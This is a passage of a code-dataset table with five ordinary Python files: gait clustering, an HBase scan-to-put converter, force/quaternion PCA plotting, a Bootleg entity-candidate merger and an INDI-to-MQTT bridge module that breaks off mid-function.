| id (string, length 1–7) | text (string, length 6–1.03M) | dataset_id (1 class) |
|---|---|---|
1696658 | import numpy as np
from gait import *
import cv2
import os
import pickle
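# Train a k-means model for one gait subject/sequence, check it, then fetch the cluster labels.
# (kmean_train, supervision and fetch_labels come from the local gait module; their exact behaviour is assumed from the names.)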
kmeans = kmean_train(subject='001',choice='bg-01',override=True)
ret = supervision(kmeans,override=True)
if ret:
    a = fetch_labels()
| StarcoderdataPython |
1798234 | #!/usr/bin/python3
import sys
import re
import numpy as np
import argparse
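# Reads a file of HBase shell 'scan' output and rewrites every result row as an equivalent 'put' command.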
def get_arguments():
    parser = argparse.ArgumentParser()
    parser.add_argument("-f", "--file", dest="source_file", help="File with Scan commands")
    parser.add_argument("-o", "--output", dest="output_file", help="File generated with Put Commands")
    options = parser.parse_args()
    if not options.source_file:
        parser.error("[-] Please specify a source file, --help for more info.")
    return options
def get_data_lines(completeStr):
    print("Getting Data Lines")
    for dataLine in re.finditer(r".*column.*timestamp.*value.*", completeStr):
        yield dataLine.group(0)
def extract_data_in_line(line):
    key, column, value = np.array(line.split(' ')).take([1, 2, 4])
    column = column.replace('column=', '').replace(',', '')
    value = value.replace('value=', '')
    return (key, column, value)
def extract_put_data_in_string(strScan):
    # named groups: row key, column qualifier and value from one scan result line
    patternToExtract = r"(?P<key>.*)(?: column=)(?P<column>.*)(?:\,\stimestamp=.*,\svalue=)(?P<value>.*)"
    return re.findall(patternToExtract, strScan)
def generate_put_command(table, key, column, value):
    return "put '{}','{}','{}','{}'".format(table.strip(), key.strip(), column.strip(), value.strip())
def data_to_put_commands(mapData):
    print("Generating put commands for data")
    for data in mapData:
        key, column, value = data
        yield generate_put_command(tableName, key, column, value)
def save_put_file(fileName, putList):
    print("Saving put file")
    with open(fileName, 'w') as f:
        for put in putList:
            f.write(put + "\n")
def get_table_name(fString):
    # Find Table Name
    print("Getting table name")
    searchTableName = re.search(r"(scan\s\')([\w|\.]+)", fString)
    if searchTableName:
        return searchTableName.group(2)
    print("Can't find a table name")
    sys.exit(1)
options = get_arguments()
file_name = options.source_file
put_file = options.output_file
print("Reading file {}".format(file_name))
with open(file_name) as f:
    fString = f.read()
tableName = get_table_name(fString)
save_put_file(put_file,
              [put for put in data_to_put_commands(extract_put_data_in_string(fString))])
| StarcoderdataPython |
94096 | import matplotlib.pyplot as plt
import numpy as np
from mpl_toolkits.mplot3d import Axes3D
from sklearn import decomposition
import scipy.signal
import os
import pandas as pd
from skimage.transform import resize
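# Feature helpers (mean, std, Welch power, FFT energy), PCA visualisation of per-class force means,
# and resampling/plotting utilities for force + quaternion recordings.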
def get_mean(signal: np.ndarray, axis=0):
    return signal.mean(axis=axis)
def get_std_dev(signal: np.ndarray, axis=0):
    return signal.std(axis=axis)
def get_power(signal: np.ndarray, axis=0, fs=1000):
    f_welch, S_xx_welch = scipy.signal.welch(signal, fs=fs, axis=0)
    df_welch = f_welch[1] - f_welch[0]
    return np.sum(S_xx_welch, axis=axis) * df_welch
def get_energy(signal: np.ndarray, axis=0):
    N = signal.shape[0]
    Xk = np.fft.fft(signal)
    return np.sum(np.abs(Xk) ** 2, axis=axis) / N
def pca(data: np.ndarray, labels: np.ndarray, n_components=3):
    X = data.copy()
    y = labels.copy()
    fig = plt.figure(1, figsize=(4, 3))
    plt.clf()
    ax = Axes3D(fig=fig, auto_add_to_figure=False, rect=[0, 0, .95, 1], elev=48, azim=134)
    fig.add_axes(ax)
    plt.cla()
    pca = decomposition.PCA(n_components=n_components)
    pca.fit(X)
    X = pca.transform(X)
    for name, label in [('box', 0), ('pufa', 1), ('profil', 2), ('gasnica', 3)]:
        ax.text3D(X[y == label, 0].mean(),
                  X[y == label, 1].mean() + 1.5,
                  X[y == label, 2].mean(), name,
                  horizontalalignment='center',
                  bbox=dict(alpha=.5, edgecolor='w', facecolor='w'))
    ax.scatter(X[:, 0], X[:, 1], X[:, 2], c=y, cmap=plt.cm.nipy_spectral,
               edgecolor='k')
    ax.w_xaxis.set_ticklabels([])
    ax.w_yaxis.set_ticklabels([])
    ax.w_zaxis.set_ticklabels([])
    plt.show()
def check_pca(path_to_data):
    data_dirs = []
    class_names = []
    class_counter = 0
    for subdir, dirs, files in os.walk(path_to_data):
        data_dirs.append(subdir)
    data_dirs.pop(0)
    column_names = ["class", "force_x_mean", "force_y_mean", "force_z_mean"]
    df_all = pd.DataFrame(columns=column_names)
    for subdir in data_dirs:
        df_log_file = pd.read_csv(os.path.join(subdir, 'log.csv'))
        print(subdir)
        for i in range(len(df_log_file)):
            forces_path = os.path.join(subdir, os.path.basename(df_log_file.loc[i, 'forces_path']))
            df_forces = pd.read_csv(os.path.join('', forces_path))
            # standardization
            # df_forces['0'] = (df_forces['0']-df_forces['0'].mean())/df_forces['0'].std()
            # df_forces['1'] = (df_forces['1'] - df_forces['1'].mean()) / df_forces['1'].std()
            # df_forces['2'] = (df_forces['2'] - df_forces['2'].mean() )/ df_forces['2'].std()
            #
            df_f_x = df_forces['0'].mean()
            df_f_y = df_forces['1'].mean()
            df_f_z = df_forces['2'].mean()
            df_all = df_all.append(
                {"class": int(class_counter), "force_x_mean": float(df_f_x), "force_y_mean": float(df_f_y),
                 "force_z_mean": float(df_f_z)}, ignore_index=True)
        class_counter += 1
    print(df_all)
    labels = df_all['class'].to_numpy()
    data = df_all.loc[:, df_all.columns != 'class'].to_numpy()
    pca(data, labels)
def df_resample(df1, num=1):
    df2 = pd.DataFrame()
    for key, value in df1.iteritems():
        temp = value.to_numpy() / value.abs().max()  # normalize
        resampled = resize(temp, (num, 1), mode='edge') * value.abs().max()  # de-normalize
        df2[key] = resampled.flatten().round(2)
    return df2
def preprocess_data(path_to_data):
    data_dirs = []
    class_names = []
    class_counter = 0
    for subdir, dirs, files in os.walk(path_to_data):
        data_dirs.append(subdir)
    data_dirs.pop(0)
    column_names = ["force_x_mean", "force_y_mean", "force_z_mean",
                    "quat_0_x", "quat_0_y", "quat_0_z", "quat_0_w",
                    "quat_1_x", "quat_1_y", "quat_1_z", "quat_1_w",
                    "quat_2_x", "quat_2_y", "quat_2_z", "quat_2_w",
                    "quat_3_x", "quat_3_y", "quat_3_z", "quat_3_w"]
    for subdir in data_dirs:
        df_log_file = pd.read_csv(os.path.join(subdir, 'log.csv'))
        for i in range(len(df_log_file)):
            forces_path = os.path.join(subdir, os.path.basename(df_log_file.loc[i, 'forces_path']))
            df_forces = pd.read_csv(os.path.join('', forces_path))
            quat_path = os.path.join(subdir, os.path.basename(df_log_file.loc[i, 'quat_path']))
            df_quat = pd.read_csv(os.path.join('', quat_path))
            df_forces = df_forces.rename(columns={"0": "force_x_mean",
                                                  "1": "force_y_mean",
                                                  "2": "force_z_mean"})
            df_quat = df_quat.rename(columns={"0": "quat_0_x",
                                              "1": "quat_0_y",
                                              "2": "quat_0_z",
                                              "3": "quat_0_w",
                                              "4": "quat_1_x",
                                              "5": "quat_1_y",
                                              "6": "quat_1_z",
                                              "7": "quat_1_w",
                                              "8": "quat_2_x",
                                              "9": "quat_2_y",
                                              "10": "quat_2_z",
                                              "11": "quat_2_w",
                                              "12": "quat_3_x",
                                              "13": "quat_3_y",
                                              "14": "quat_3_z",
                                              "15": "quat_3_w"
                                              })
            df_forces = df_forces.drop(['Unnamed: 0'], axis=1)
            df_quat = df_quat.drop(['Unnamed: 0'], axis=1)
            df_forces = df_resample(df_forces, 3000)
            df_quat = df_resample(df_quat, 3000)
            df_combined = pd.concat([df_forces, df_quat], axis=1)
            df_combined.plot()
            plt.show()
def plot_data(path_to_data):
    data_dirs = []
    class_names = []
    class_counter = 0
    for subdir, dirs, files in os.walk(path_to_data):
        data_dirs.append(subdir)
    data_dirs.pop(0)
    column_names = ["class", "force_x_mean", "force_y_mean", "force_z_mean",
                    "quat_0_x", "quat_0_y", "quat_0_z", "quat_0_w",
                    "quat_1_x", "quat_1_y", "quat_1_z", "quat_1_w",
                    "quat_2_x", "quat_2_y", "quat_2_z", "quat_2_w",
                    "quat_3_x", "quat_3_y", "quat_3_z", "quat_3_w"]
    df_data = pd.DataFrame(columns=column_names)
    for subdir in data_dirs:
        df_log_file = pd.read_csv(os.path.join(subdir, 'log.csv'))
        for i in range(len(df_log_file)):
            forces_path = os.path.join(subdir, os.path.basename(df_log_file.loc[i, 'forces_path']))
            df_forces = pd.read_csv(os.path.join('', forces_path))
            quat_path = os.path.join(subdir, os.path.basename(df_log_file.loc[i, 'quat_path']))
            df_quat = pd.read_csv(os.path.join('', quat_path))
            df_forces = df_resample(df_forces, 3000)
            df_quat = df_resample(df_quat, 3000)
            plt.plot(df_forces['0'])
            plt.plot(df_quat['0'])
            plt.plot(df_quat['1'])
            plt.plot(df_quat['2'])
            plt.plot(df_quat['3'])
            plt.show()
| StarcoderdataPython |
1693348 | """
This file
1. Reads in raw wikipedia sentences from /lfs/raiders7/0/lorr1/sentences
2. Reads in map of WPID-Title-QID from /lfs/raiders7/0/lorr1/title_to_all_ids.jsonl
3. Computes frequencies for alias-QID over Wikipedia. Keeps only alias-QID mentions which occur > args.min_frequency
4. Merges alias-QID map with alias-QID map extracted from Wikidata
5. Saves alias-qid map as alias_to_qid_filter.json to args.data_dir
After this, run remove_bad_aliases.py
Example run command:
python3.6 -m contextual_embeddings.bootleg_data_prep.curate_aliases
"""
import argparse
import glob
import multiprocessing
import os
import shutil
import time
import numpy as np
import ujson
import ujson as json
from tqdm import tqdm
from bootleg.symbols.entity_symbols import EntitySymbols
from bootleg.utils import utils
def get_arg_parser():
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument(
"--contextual_cand_data",
type=str,
default="/dfs/scratch0/lorr1/projects/bootleg-data/data/medmentions_0203/files",
help="Where files saved",
)
parser.add_argument(
"--entity_dump",
type=str,
default="/dfs/scratch0/lorr1/projects/bootleg-data/data/medmentions_0203/entity_db/entity_mappings",
help="Where files saved",
)
parser.add_argument(
"--data_dir",
type=str,
default="/dfs/scratch0/lorr1/projects/bootleg-data/data/medmentions_0203",
help="Where files saved",
)
parser.add_argument(
"--out_subdir",
type=str,
default="text",
help="Where files saved",
)
parser.add_argument("--train_in_candidates", action="store_true")
parser.add_argument(
"--keep_orig",
action="store_true",
help="This will keep the original Bootleg maps but add contextual candidates to max out at 30",
)
parser.add_argument("--max_candidates", type=int, default=int(30))
parser.add_argument("--processes", type=int, default=int(1))
return parser
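# Pool initializer: each worker process loads the entity dump once and keeps it as a process-global.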
def init_process(entity_dump_f):
global ed_global
ed_global = EntitySymbols.load_from_cache(load_dir=entity_dump_f)
def merge_data(
num_processes,
train_in_candidates,
keep_orig,
max_candidates,
file_pairs,
entity_dump_f,
):
# File pair is in file, cand map file, out file, is_train
# Chunk file for parallel writing
create_ex_indir = os.path.join(
os.path.dirname(file_pairs[0]), "_bootleg_temp_indir"
)
utils.ensure_dir(create_ex_indir)
create_ex_indir_cands = os.path.join(
os.path.dirname(file_pairs[0]), "_bootleg_temp_indir2"
)
utils.ensure_dir(create_ex_indir_cands)
create_ex_outdir = os.path.join(
os.path.dirname(file_pairs[0]), "_bootleg_temp_outdir"
)
utils.ensure_dir(create_ex_outdir)
print(f"Counting lines")
total_input = sum(1 for _ in open(file_pairs[0]))
total_input_cands = sum(1 for _ in open(file_pairs[1]))
assert (
total_input_cands == total_input
), f"{total_input} lines of orig data != {total_input_cands} of cand data"
chunk_input_size = int(np.ceil(total_input / num_processes))
total_input_from_chunks, input_files_dict = utils.chunk_file(
file_pairs[0], create_ex_indir, chunk_input_size
)
total_input_cands_from_chunks, input_files_cands_dict = utils.chunk_file(
file_pairs[1], create_ex_indir_cands, chunk_input_size
)
input_files = list(input_files_dict.keys())
input_cand_files = list(input_files_cands_dict.keys())
assert len(input_cand_files) == len(input_files)
input_file_lines = [input_files_dict[k] for k in input_files]
input_cand_file_lines = [input_files_cands_dict[k] for k in input_cand_files]
for p_l, p_r in zip(input_file_lines, input_cand_file_lines):
assert (
p_l == p_r
), f"The matching chunk files don't have matching sizes {p_l} versus {p_r}"
output_files = [
in_file_name.replace(create_ex_indir, create_ex_outdir)
for in_file_name in input_files
]
assert (
total_input == total_input_from_chunks
), f"Lengths of files {total_input} doesn't match {total_input_from_chunks}"
assert (
total_input_cands == total_input_cands_from_chunks
), f"Lengths of files {total_input_cands} doesn't match {total_input_cands_from_chunks}"
# file_pairs is input file, cand map file, output file, is_train
input_args = [
[
train_in_candidates,
keep_orig,
max_candidates,
input_files[i],
input_file_lines[i],
input_cand_files[i],
output_files[i],
file_pairs[3],
]
for i in range(len(input_files))
]
pool = multiprocessing.Pool(
processes=num_processes, initializer=init_process, initargs=[entity_dump_f]
)
new_alias2qids = {}
total_seen = 0
total_dropped = 0
for res in pool.imap(merge_data_hlp, input_args, chunksize=1):
temp_alias2qids, seen, dropped = res
total_seen += seen
total_dropped += dropped
for k in temp_alias2qids:
assert k not in new_alias2qids, f"{k}"
new_alias2qids[k] = temp_alias2qids[k]
print(
f"Overall Recall for {file_pairs[0]}: {(total_seen - total_dropped) / total_seen} for seeing {total_seen}"
)
# Merge output files to final file
print(f"Merging output files")
with open(file_pairs[2], "wb") as outfile:
for filename in glob.glob(os.path.join(create_ex_outdir, "*")):
if filename == file_pairs[2]:
# don't want to copy the output into the output
continue
with open(filename, "rb") as readfile:
shutil.copyfileobj(readfile, outfile)
# Remove temporary files/folders
shutil.rmtree(create_ex_indir)
shutil.rmtree(create_ex_indir_cands)
shutil.rmtree(create_ex_outdir)
return new_alias2qids
def merge_data_hlp(args):
(
train_in_candidates,
keep_orig,
max_candidates,
input_file,
total_input,
input_cand_file,
output_file,
is_train,
) = args
sent2cands = {}
sent2probs = {}
new_alias2qids = {}
with open(input_cand_file, "r") as f_in:
for line in tqdm(f_in, total=total_input, desc="Processing cand data"):
line = ujson.loads(line)
if "probs" in line:
sent2probs[line["sent_idx_unq"]] = line["probs"]
sent2cands[line["sent_idx_unq"]] = line["cands"]
total_dropped = 0
total_seen = 0
total_len = 0
with open(input_file) as f_in, open(output_file, "w") as f_out:
tag = os.path.splitext(os.path.basename(input_file))[0]
for line in tqdm(f_in, total=total_input, desc="Processing data"):
line = ujson.loads(line)
sent_idx_unq = line["sent_idx_unq"]
if sent_idx_unq not in sent2cands:
assert (
len(line["aliases"]) == 0
), f"{sent_idx_unq} not in cand maps but there are aliases"
cands = sent2cands[sent_idx_unq]
probs = sent2probs.get(
sent_idx_unq,
[[500 - j for j in range(len(cand_set))] for cand_set in cands],
)
assert len(cands) == len(
line["aliases"]
), f"The length of aliases does not match cands in {sent_idx_unq}"
assert len(probs) == len(
line["aliases"]
), f"The length of aliases does not match probs in {sent_idx_unq}"
new_als, new_qids, new_spans, new_golds = [], [], [], []
new_slices = {}
j = 0
for i in range(len(line["aliases"])):
total_seen += 1
new_al = f"al_{sent_idx_unq}_{i}_{tag}"
new_cand_pairs = [
[c, p]
for c, p in zip(cands[i], probs[i])
if ed_global.qid_exists(c)
]
if keep_orig:
orig_cand_pairs = ed_global.get_qid_count_cands(line["aliases"][i])
assert len(orig_cand_pairs) <= max_candidates
final_cand_pairs = orig_cand_pairs
final_cand_set = set(map(lambda x: x[0], final_cand_pairs))
for ctx_q, ctx_val in sorted(
new_cand_pairs, key=lambda x: x[1], reverse=False
):
if len(final_cand_pairs) >= max_candidates:
break
if ctx_q not in final_cand_set:
final_cand_pairs.append([ctx_q, ctx_val])
else:
final_cand_pairs = new_cand_pairs[:max_candidates]
total_len += len(final_cand_pairs)
# We are training in candidates and gold is not in list, discard
if (
is_train
and train_in_candidates
and line["qids"][i] not in [p[0] for p in final_cand_pairs]
):
total_dropped += 1
continue
new_alias2qids[new_al] = final_cand_pairs
new_als.append(new_al)
new_qids.append(line["qids"][i])
new_spans.append(line["spans"][i])
new_golds.append(line["gold"][i])
for slice_name in line.get("slices", {}):
if slice_name not in new_slices:
new_slices[slice_name] = {}
new_slices[slice_name][str(j)] = line["slices"][slice_name][str(i)]
j += 1
line["old_aliases"] = line["aliases"][:]
line["aliases"] = new_als
line["qids"] = new_qids
line["spans"] = new_spans
line["gold"] = new_golds
line["slices"] = new_slices
f_out.write(ujson.dumps(line) + "\n")
print(
f"Total Seen: {total_seen}, Total Dropped: {total_dropped}, "
f"Recall: {(total_seen - total_dropped) / total_seen}, "
f"Avg Cand Len: {total_len / (total_seen)} for {input_file}"
)
return new_alias2qids, total_seen, total_dropped
def main():
gl_start = time.time()
multiprocessing.set_start_method("spawn")
args = get_arg_parser().parse_args()
print(json.dumps(vars(args), indent=4))
utils.ensure_dir(args.data_dir)
out_dir = os.path.join(args.data_dir, args.out_subdir)
if os.path.exists(out_dir):
shutil.rmtree(out_dir)
os.makedirs(out_dir, exist_ok=True)
# Reading in files
in_files_train = glob.glob(os.path.join(args.data_dir, "*.jsonl"))
in_files_cand = glob.glob(os.path.join(args.contextual_cand_data, "*.jsonl"))
assert len(in_files_train) > 0, f"We didn't find any train files at {args.data_dir}"
assert (
len(in_files_cand) > 0
), f"We didn't find any contextual files at {args.contextual_cand_data}"
in_files = []
for file in in_files_train:
file_name = os.path.basename(file)
tag = os.path.splitext(file_name)[0]
is_train = "train" in tag
if is_train:
print(f"{file_name} is a training dataset...will be processed as such")
pair = None
for f in in_files_cand:
if tag in f:
pair = f
break
assert pair is not None, f"{file_name} name, {tag} tag"
out_file = os.path.join(out_dir, file_name)
in_files.append([file, pair, out_file, is_train])
final_cand_map = {}
max_cands = 0
for pair in in_files:
print(f"Reading in {pair[0]} with cand maps {pair[1]} and dumping to {pair[2]}")
new_alias2qids = merge_data(
args.processes,
args.train_in_candidates,
args.keep_orig,
args.max_candidates,
pair,
args.entity_dump,
)
for al in new_alias2qids:
assert al not in final_cand_map, f"{al} is already in final_cand_map"
final_cand_map[al] = new_alias2qids[al]
max_cands = max(max_cands, len(final_cand_map[al]))
print(f"Buidling new entity symbols")
entity_dump = EntitySymbols.load_from_cache(load_dir=args.entity_dump)
entity_dump_new = EntitySymbols(
max_candidates=max_cands,
alias2qids=final_cand_map,
qid2title=entity_dump.get_qid2title(),
)
out_dir = os.path.join(out_dir, "entity_db/entity_mappings")
entity_dump_new.save(out_dir)
print(f"Finished in {time.time() - gl_start}s")
if __name__ == "__main__":
main()
| StarcoderdataPython |
1717384 | <filename>indi_mr/i_to_m.py
"""Defines blocking function inditomqtt:
Receives XML data from indiserver on port 7624 and publishes via MQTT.
Receives data from MQTT, and outputs to port 7624 and indiserver.
"""
import sys, collections, threading, asyncio
from time import sleep
from datetime import datetime
import xml.etree.ElementTree as ET
from . import toindi, fromindi, tools
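# paho-mqtt is optional at import time; if it is missing, inditomqtt() reports the error and exits.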
MQTT_AVAILABLE = True
try:
import paho.mqtt.client as mqtt
except:
MQTT_AVAILABLE = False
# _STARTTAGS is a tuple of ( b'<defTextVector', ... ) data received will be tested to start with such a starttag
_STARTTAGS = tuple(b'<' + tag for tag in fromindi.TAGS)
# _ENDTAGS is a tuple of ( b'</defTextVector>', ... ) data received will be tested to end with such an endtag
_ENDTAGS = tuple(b'</' + tag + b'>' for tag in fromindi.TAGS)
### MQTT Handlers for inditomqtt
def _inditomqtt_on_message(client, userdata, message):
"Callback when an MQTT message is received"
if message.topic == userdata["pubsnoopcontrol"]:
# The message received on the snoop control topic, is one this device has transmitted, ignore it
return
# On receiving a getproperties on snoop_control/#, checks the name, property to be snooped
if message.topic.startswith(userdata["snoop_control_topic"]+"/"):
try:
root = ET.fromstring(message.payload.decode("utf-8"))
except Exception:
# possible malformed
return
if root.tag != "getProperties":
# only getProperties is listened to on snoop_control_topic
return
devicename = root.get("device")
propertyname = root.get("name")
if propertyname and (not devicename):
# illegal
return
snooptopic, remote_mqtt_id = message.topic.split("/", maxsplit=1)
if not devicename:
# Its a snoop everything request
userdata["sendsnoopall"].add(remote_mqtt_id)
elif not propertyname:
# Its a snoop device request
sendsnoopdevices = userdata["sendsnoopdevices"]
if devicename in sendsnoopdevices:
sendsnoopdevices[devicename].add(remote_mqtt_id)
else:
sendsnoopdevices[devicename] = set((remote_mqtt_id,))
else:
# Its a snoop device/property request
sendsnoopproperties = userdata["sendsnoopproperties"]
if (devicename,propertyname) in sendsnoopproperties:
sendsnoopproperties[devicename,propertyname].add(remote_mqtt_id)
else:
sendsnoopproperties[devicename,propertyname] = set((remote_mqtt_id,))
if message.payload.startswith(b"delProperty"):
try:
root = ET.fromstring(message.payload.decode("utf-8"))
except Exception:
# possible malformed
return
_remove(root, userdata)
# we have received a message from the mqtt server, put it into the data_to_indi buffer
userdata['data_to_indi'].append(message.payload)
def _inditomqtt_on_connect(client, userdata, flags, rc):
"The callback for when the client receives a CONNACK response from the MQTT server, renew subscriptions"
userdata['data_to_indi'].clear() # - start with fresh empty data_to_indi buffer
if rc == 0:
userdata['comms'] = True
# Subscribing in on_connect() means that if we lose the connection and
# reconnect then subscriptions will be renewed.
if userdata["subscribe_list"]:
# subscribe to those remote id's listed
subscribe_list = list((userdata["to_indi_topic"] + "/" + remote_id, 2) for remote_id in userdata["subscribe_list"] )
# gives a list of [(topic1,2),(topic2,2),(topic3,2)]
client.subscribe( subscribe_list )
else:
# subscribe to all remote id's
client.subscribe( userdata["to_indi_topic"] + "/#", 2 )
# Every device subscribes to snoop_control/# being the snoop_control topic and all subtopics
client.subscribe( userdata["snoopcontrol"], 2 )
# and to snoop_data/mqtt_id
client.subscribe( userdata["snoopdata"], 2 )
# Finally, send a getProperties to all devices, so they refresh data
userdata['data_to_indi'].append(b"<getProperties version=\"1.7\" />")
print(f"""MQTT connected""")
else:
userdata['comms'] = False
def _inditomqtt_on_disconnect(client, userdata, rc):
"The MQTT client has disconnected, set userdata['comms'] = False, and clear out any data hanging about in data_to_indi"
userdata['comms'] = False
userdata['data_to_indi'].clear()
def _sendtomqtt(payload, topic, mqtt_client):
"Gets data which has been received from indi, and transmits to mqtt"
result = mqtt_client.publish(topic=topic, payload=payload, qos=2)
result.wait_for_publish()
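# Bridges the indiserver TCP port and MQTT: one coroutine writes queued MQTT payloads to the port,
# the other reads XML from the port and republishes it (including to any snooping connections).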
class _PortHandler:
def __init__(self, loop, userdata, mqtt_client, indiserver):
"Sets the userdata"
self.userdata = userdata
self.loop = loop
self.mqtt_client = mqtt_client
self.indiserver = indiserver
self.topic = userdata["from_indi_topic"] + "/" + userdata["mqtt_id"]
self.snoop_data_topic = userdata["snoop_data_topic"] + "/" # this will always have a remote mqtt_id appended
self.data_to_indi = userdata['data_to_indi']
self.deviceset = userdata['deviceset']
self.sendsnoopall = userdata["sendsnoopall"]
self.sendsnoopdevices = userdata["sendsnoopdevices"]
self.sendsnoopproperties = userdata["sendsnoopproperties"]
async def handle_data(self):
reader, writer = await asyncio.open_connection(self.indiserver.host,self.indiserver.port)
_message(self.topic, self.mqtt_client, f"Connected to {self.indiserver.host}:{self.indiserver.port}")
await asyncio.gather(self.txtoindi(writer), self.rxfromindi(reader))
async def txtoindi(self, writer):
"Pop message from data_to_indi deque, and write it to the port connection"
while True:
if self.data_to_indi:
# Send the next message to the indiserver
to_indi = self.data_to_indi.popleft()
writer.write(to_indi)
await writer.drain()
else:
# no message to send, do an async pause
await asyncio.sleep(0.5)
async def rxfromindi(self, reader):
"""get data received from the port connection, and call _sendtomqtt to send it to MQTT
checks if the data received is to be sent to a snooping device, if so, send it"""
message = b''
messagetagnumber = None
while True:
# get blocks of data from the indiserver
try:
data = await reader.readuntil(separator=b'>')
except asyncio.LimitOverrunError:
data = await reader.read(n=32000)
if not message:
# data is expected to start with <tag, first strip any newlines
data = data.strip()
for index, st in enumerate(_STARTTAGS):
if data.startswith(st):
messagetagnumber = index
break
else:
# check if data received is a b'<getProperties ... />' snooping request
if data.startswith(b'<getProperties '):
# send a snoop request on topic snoop_control/mqtt_id where mqtt_id is its own id
result = await self.loop.run_in_executor(None, _sendtomqtt, data, self.userdata["pubsnoopcontrol"], self.mqtt_client)
# data is either a getProperties, or does not start with a recognised tag, so ignore it
# and continue waiting for a valid message start
continue
# set this data into the received message
message = data
# either further children of this tag are coming, or maybe it's a single tag ending in "/>"
if message.endswith(b'/>'):
# the message is complete, handle message here
try:
root = ET.fromstring(message.decode("utf-8"))
except Exception:
# possible malformed
message = b''
messagetagnumber = None
continue
devicename = root.get("device")
# Run '_sendtomqtt' in the default loop's executor:
result = await self.loop.run_in_executor(None, _sendtomqtt, message, self.topic, self.mqtt_client)
# check if this data is to be sent to snooping devices
for mqtt_id in self.sendsnoopall:
# these connections snoop everything
snooptopic = self.snoop_data_topic + mqtt_id
result = await self.loop.run_in_executor(None, _sendtomqtt, message, snooptopic, self.mqtt_client)
if devicename in self.deviceset:
if devicename in self.sendsnoopdevices:
# set of mqtt_id's which snoop this devicename
for mqtt_id in self.sendsnoopdevices[devicename]:
snooptopic = self.snoop_data_topic + mqtt_id
result = await self.loop.run_in_executor(None, _sendtomqtt, message, snooptopic, self.mqtt_client)
propertyname = root.get("name")
if propertyname:
if (devicename,propertyname) in self.sendsnoopproperties:
# set of mqtt_id's which snoop this devicename/propertyname
for mqtt_id in self.sendsnoopproperties[devicename,propertyname]:
snooptopic = self.snoop_data_topic + mqtt_id
result = await self.loop.run_in_executor(None, _sendtomqtt, message, snooptopic, self.mqtt_client)
# and start again, waiting for a new message
if devicename:
self.deviceset.add(devicename)
if root.tag == "delProperty":
# remove this device/property from snooping records
_remove(root, self.userdata)
message = b''
messagetagnumber = None
# and read either the next message, or the children of this tag
continue
# To reach this point, the message is in progress, with a messagetagnumber set
# keep adding the received data to message, until an endtag is reached
message += data
if message.endswith(_ENDTAGS[messagetagnumber]):
# the message is complete, handle message here
try:
root = ET.fromstring(message.decode("utf-8"))
except Exception:
# possible malformed
message = b''
messagetagnumber = None
continue
devicename = root.get("device")
# Run '_sendtomqtt' in the default loop's executor:
result = await self.loop.run_in_executor(None, _sendtomqtt, message, self.topic, self.mqtt_client)
# check if this data is to be sent to snooping devices
for mqtt_id in self.sendsnoopall:
# these connections snoop everything
snooptopic = self.snoop_data_topic + mqtt_id
result = await self.loop.run_in_executor(None, _sendtomqtt, message, snooptopic, self.mqtt_client)
if devicename in self.deviceset:
if devicename in self.sendsnoopdevices:
# set of mqtt_id's which snoop this devicename
for mqtt_id in self.sendsnoopdevices[devicename]:
snooptopic = self.snoop_data_topic + mqtt_id
result = await self.loop.run_in_executor(None, _sendtomqtt, message, snooptopic, self.mqtt_client)
propertyname = root.get("name")
if propertyname:
if (devicename,propertyname) in self.sendsnoopproperties:
# set of mqtt_id's which snoop this devicename/propertyname
for mqtt_id in self.sendsnoopproperties[devicename,propertyname]:
snooptopic = self.snoop_data_topic + mqtt_id
result = await self.loop.run_in_executor(None, _sendtomqtt, message, snooptopic, self.mqtt_client)
# and start again, waiting for a new message
if devicename:
self.deviceset.add(devicename)
if root.tag == "delProperty":
# remove this device/property from snooping records
_remove(root, self.userdata)
message = b''
messagetagnumber = None
def inditomqtt(indiserver, mqtt_id, mqttserver, subscribe_list=[]):
"""Blocking call that provides the indiserver - mqtt connection. If subscribe list is empty
then this function subscribes to received data from all remote mqtt_id's. If it
contains a list of mqtt_id's, then only subscribes to their data.
:param indiserver: Named Tuple providing the indiserver parameters
:type indiserver: namedtuple
:param mqtt_id: A unique string, identifying this connection
:type mqtt_id: String
:param mqttserver: Named Tuple providing the mqtt server parameters
:type mqttserver: namedtuple
:param subscribe_list: List of remote mqtt_id's to subscribe to
:type subscribe_list: List
"""
if not MQTT_AVAILABLE:
print("Error - Unable to import the Python paho.mqtt.client package")
sys.exit(1)
if (not mqtt_id) or (not isinstance(mqtt_id, str)):
print("Error - An mqtt_id must be given and must be a non-empty string.")
sys.exit(1)
# wait for five seconds before starting, to give mqtt and other servers
# time to start up
sleep(5)
print("inditomqtt started")
# The data_to_indi deque has its right side filled from MQTT and its left side
# sent to indiserver.
data_to_indi = collections.deque(maxlen=100)
# create an mqtt client and connection
userdata={ "comms" : False, # an indication mqtt connection is working
"to_indi_topic" : mqttserver.to_indi_topic,
"from_indi_topic" : mqttserver.from_indi_topic,
"snoop_control_topic" : mqttserver.snoop_control_topic,
"snoop_data_topic" : mqttserver.snoop_data_topic,
"mqtt_id" : mqtt_id,
"snoopdata" : mqttserver.snoop_data_topic + "/" + mqtt_id,
"snoopcontrol" : mqttserver.snoop_control_topic + "/#", # used to receive other's getproperty
"pubsnoopcontrol" : mqttserver.snoop_control_topic + "/" + mqtt_id, # used when publishing a getproperty
"subscribe_list" : subscribe_list,
"data_to_indi" : data_to_indi,
"deviceset" : set(), # a set of device names served by this indiserver
"sendsnoopall" : set(), # a set of mqtt_id's which want all data sent to them
"sendsnoopdevices" : {}, # a dictionary of {devicename: set of mqtt_id's, ...}
# which are those connections which snoop the given devicename
"sendsnoopproperties" : {} # a dictionary of {(devicename,propertyname): set of mqtt_id's, ...}
# which are those connections which snoop the given device/property
}
mqtt_client = mqtt.Client(client_id=mqtt_id, userdata=userdata)
# attach callback function to client
mqtt_client.on_connect = _inditomqtt_on_connect
mqtt_client.on_disconnect = _inditomqtt_on_disconnect
mqtt_client.on_message = _inditomqtt_on_message
# If a username/password is set on the mqtt server
if mqttserver.username and mqttserver.password:
mqtt_client.username_pw_set(username = mqttserver.username, password = mqttserver.password)
elif mqttserver.username:
mqtt_client.username_pw_set(username = mqttserver.username)
# connect to the MQTT server
mqtt_client.connect(host=mqttserver.host, port=mqttserver.port)
mqtt_client.loop_start()
# Now create a loop to tx and rx the indiserver port
loop = asyncio.get_event_loop()
indiconnection = _PortHandler(loop, userdata, mqtt_client, indiserver)
while True:
data_to_indi.clear()
data_to_indi.append(b'<getProperties version="1.7" />')
try:
loop.run_until_complete(indiconnection.handle_data())
except ConnectionRefusedError:
